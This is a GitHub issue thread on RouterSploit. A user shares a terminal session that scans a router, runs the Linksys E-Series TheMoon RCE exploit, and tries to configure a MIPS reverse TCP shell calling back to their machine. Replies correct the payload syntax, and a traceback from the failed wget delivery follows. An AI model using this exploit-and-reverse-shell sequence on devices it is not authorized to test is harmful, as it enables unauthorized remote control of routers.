routersploit
New to routersploit, what to do after run of exploit in cmd?
! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !
Steps to Reproduce (for bugs)
- Not a bug, just need guidance
Your Environment
- RouterSploit Version used: 3.4.1
- Operating System and version: Kali 2021.3
- Python Version: 3.9.7
- Python Environment: There are too many packages to display here, but I just installed the routersploit requirements today (July 3).
Current Behavior
- It's better if I show you the steps I ran in the output:
```
[+] 172.16.1.254 Device is vulnerable:
Target Port Service Exploit
------ ---- ------- -------
172.16.1.254 80 http exploits/routers/linksys/eseries_themoon_rce
[-] 172.16.1.254 Could not find default credentials
rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
ssl false SSL enabled: true/false
target Target IPv4 or IPv6 address
port 80 Target HTTP port
Module options:
Name Current settings Description
---- ---------------- -----------
verbosity true Verbosity enabled: true/false
arch mipsle Target architecture: mipsbe, mipsle
rsf (Linksys E-Series TheMoon RCE) > set target 172.16.1.254
[+] target => 172.16.1.254
rsf (Linksys E-Series TheMoon RCE) > check
[+] Target is vulnerable
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module exploits/routers/linksys/eseries_themoon_rce...
[+] Target is vulnerable
[*] Invoking command loop...
[*] It is blind command injection - response is not available
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
mipsle/bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture.
mipsle/reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture.
cmd > use mipsle/reverse_tcp
[*] Executing 'use mipsle/reverse_tcp' on the device...
cmd > set lhost 172.16.1.228
[*] Executing 'set lhost 172.16.1.228' on the device...
cmd > set lport 4321
[*] Executing 'set lport 4321' on the device...
cmd > run
[*] Executing 'run' on the device...
cmd > execute
[*] Executing 'execute' on the device...
cmd > use payloads/mipsle/reverse_tcp
[*] Executing 'use payloads/mipsle/reverse_tcp' on the device...
cmd >
```
Expected Behavior
- As you can see at the end there, I was trying to figure out what to do, but essentially, I followed the steps to find the specific vulnerabilities of my router, and it found the `exploits/routers/linksys/eseries_themoon_rce` exploit, which is odd because my router is a 2wire, but maybe they're the same thing.
- Once I `use` the exploit, set my router as the `target`, it seems to open a `cmd` terminal environment to the device. Is this normal? It says that it's a blind command injection, which is fine, however I try to use `use mipsle/reverse_tcp` to attempt a reverse shell, but I think I'm doing this wrong.
Do I create the reverse shell OUTSIDE of this cmd first, and then somehow run an inject command to inject that payload into the router? And if so, how do I accomplish that? The tutorials on here show how to create the payload, but nothing from there.
Isn't it "set payload mipsle/reverse_tcp"?
It should be `set payload mipsle/reverse_tcp`.
```
Traceback (most recent call last):
  File "interpreter.py", line 389, in command_run
    self.current_module.run()
  File "eseries_themoon_rce.py", line 54, in run
    shell(self, architecture="mipsle", method="wget", location="/tmp")
  File "shell.py", line 124, in shell
    data = payload.generate()
           ^^^^^^^^^^^^^^^^^^
  File "reverse_tcp.py", line 21, in generate
    reverse_ip = utils.convert_ip(self.lhost)
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "utils.py", line 69, in convert_ip
    res += bytes([int(i)])
                  ^^^^^^
ValueError: invalid literal for int() with base 10: ''

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "rsf.py", line 29, in
```
Is what it says when I try to run the payload